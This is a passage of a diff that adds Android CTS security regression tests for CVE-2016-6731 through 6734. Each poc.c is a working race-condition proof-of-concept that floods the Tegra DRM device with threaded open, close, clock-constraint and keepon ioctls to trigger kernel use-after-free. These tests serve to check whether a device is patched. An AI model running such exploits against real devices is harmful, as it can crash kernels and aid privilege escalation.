+LOCAL_MODULE := CVE-2016-6731
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
new file mode 100644
index 0000000..d6cedfb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_SET_CLK_CONSTRAINT 0x13
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_SET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+ puts("ran 1");
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ puts("ran 2");
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
new file mode 100644
index 0000000..03b7b87
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6732
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
new file mode 100644
index 0000000..5b8ea8e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6732/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define THREAD_NUM 900
+#define TRY_TIMES 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret){
+ }else{
+ }
+ /* close */
+ close_c.context = open_c.context;
+
+ /* swtich to child */
+ usleep(500);
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
new file mode 100644
index 0000000..7b02188
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6733
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
new file mode 100644
index 0000000..1c1dde9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/local_pwn.h
@@ -0,0 +1,62 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
new file mode 100644
index 0000000..7980fc9
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6733/poc.c
@@ -0,0 +1,158 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+#define THREAD_NUM 900
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+
+int fd;
+pthread_t thread_id[THREAD_NUM] = { 0 };
+int thread_ret[THREAD_NUM] = { 0 };
+int futex_signal = 0;
+
+struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%s\n", errno, strerror(errno));
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* child(void* no_use)
+{
+ int ret = 1;
+ set_affinity(1);
+
+ while(ret){
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = THREAD_NUM, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ printf("[+] open failed %d %s\n", errno, strerror(errno));
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ thread_ret[i] = pthread_create(thread_id + i, NULL, child, NULL);
+ }
+
+ while(try_time--){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ /* close */
+ close_c.context = open_c.context;
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ if(ret){
+ }else{
+ open_c.context = 0UL;
+ }
+ }
+
+out_thread:
+ /* kill thread */
+ for(i = 0; i < THREAD_NUM; i++){
+ if(!thread_ret[i]){
+ pthread_kill(thread_id[i], SIGKILL);
+ }
+ }
+
+out_close:
+ close(fd);
+ return 0;
+}
+
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
new file mode 100644
index 0000000..e1eebbd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6734
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
new file mode 100644
index 0000000..60b3a3c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6734/poc.c
@@ -0,0 +1,161 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define KEEPON_THREAD_NUM 900
+#define TRY_TIMES KEEPON_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_START_KEEPON 0x10
+
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_keepon {
+ volatile __u64 context;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_START_KEEPON DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_START_KEEPON, struct drm_tegra_keepon)
+
+int fd;
+pthread_t keepon_thread_id[KEEPON_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_keepon keepon_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* keepon_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_START_KEEPON, &keepon_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ ret = pthread_create(keepon_thread_id + i, NULL, keepon_thread, NULL);
+ if(ret){
+ goto out_keepon_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set keepon */
+ keepon_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_keepon_thread:
+ /* kill keepon thread */
+ for(i = 0; i < KEEPON_THREAD_NUM; i++){
+ pthread_kill(keepon_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
new file mode 100644
index 0000000..8935cd6
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6735/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
